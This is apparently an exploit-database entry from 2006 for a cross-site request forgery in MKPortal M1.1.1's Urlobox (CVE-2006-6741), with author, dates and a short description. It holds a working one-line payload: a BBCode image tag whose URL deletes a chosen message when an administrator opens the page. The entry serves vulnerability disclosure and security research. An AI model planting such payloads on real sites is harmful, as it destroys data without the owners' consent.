MKPortal M1.1.1 - 'Urlobox' Cross-Site Request Forgery

Author: Demential
type: webapps
platform: php
port: 
date_added: 2006-12-20  
date_updated: 2016-09-20  
verified: 1  
codes: CVE-2006-6741  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2977.txt  

MkPortal Urlobox Cross Site Request Forgery

Discovered by: Demential
Web: http://www.burnhead.it
E-mail: info@burnhead.it
Mkportal website: http://www.mkportal.it

posting [img]?ind=urlobox&op=delete&idurlo=X[/img] in MkPortal urlobox
where X is an ID of a message,
when administrator opens urlobox page message X will be erased.

# milw0rm.com [2006-12-21]